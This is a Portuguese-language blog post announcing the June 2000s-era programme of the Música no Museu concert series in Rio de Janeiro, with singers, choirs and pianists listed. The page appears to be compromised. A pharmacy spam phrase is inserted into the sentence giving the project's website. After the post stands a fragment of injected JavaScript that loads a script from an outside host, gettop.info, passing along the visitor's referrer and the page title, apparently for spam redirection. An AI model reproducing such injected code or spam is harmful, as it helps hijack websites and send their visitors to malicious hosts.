Música de câmaraProgramaçãoRio de Janeiro

Música no Museu privilegia voz em junho

Depois do sucesso em maio do VI RioHarpFestival – todos os concertos lotados – Música no Museu, em junho, privilegia voz nos seus 29 concertos do Rio de Janeiro, mesclando trechos de óperas, clássicos brasileiros e europeus com duas exceções em piano solo, Fernanda Canaud, dia 1º. no Museu da República e Pablo Lapidusas, no dia 2 no Museu Nacional de Belas Artes.

Nas árias de ópera, entre outros, os duos Cyro Delvizo e Manuelai Camargo, violão e soprano; Jessé Bueno e Cláudio Henrique Ávila, barítono e piano; Paloma Godoy e Milena Almenara, soprano e piano; Carla Pacheco e Dilia Tosta, soprano e piano. Além disto, coros e corais, como o Yellow Cake, Madrigal Contemporâneo, Coral Abstrassom, Firjan, Inmetro, BarraMares, Caixa Econômica Federal, Feic, Madrigal Cruz Lopes, entre outros.

Destaque também para o Duo Milewsky (Jerzy Milewsky, violino e Aleida Schweitzer, piano), em Recife, Olinda e João Pessoa, na versão Norte Nordeste e para a pianista Fernanda Canaud no Palacio Foz, em Lisboa, Instituto Cervantes, em Madrid e Museu Guggenheim em Bilbao na versão Musica no Museu Internacional em Portugal e na Espanha e que, juntando com as apresentações em São Paulo, totalizarão 38 concertos no mês.

Mais informações através do tel.: (21) 2253-8645.

Programação completa no site do projeto cialis verified by visa uk www.musicanomuseu.com.br

 

 if (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

1 Comment

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.